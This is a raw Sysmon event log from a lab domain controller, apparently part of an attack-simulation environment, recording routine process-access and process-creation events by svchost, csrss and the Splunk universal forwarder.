13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8EE3-6005-B200-00000000A301}41921756C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.617{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.326{59A5CD1D-8EE3-6005-B300-00000000A301}648812C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.326{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B300-00000000A301}648C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.311{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8EE3-6005-B100-00000000A301}41244184C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.321{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 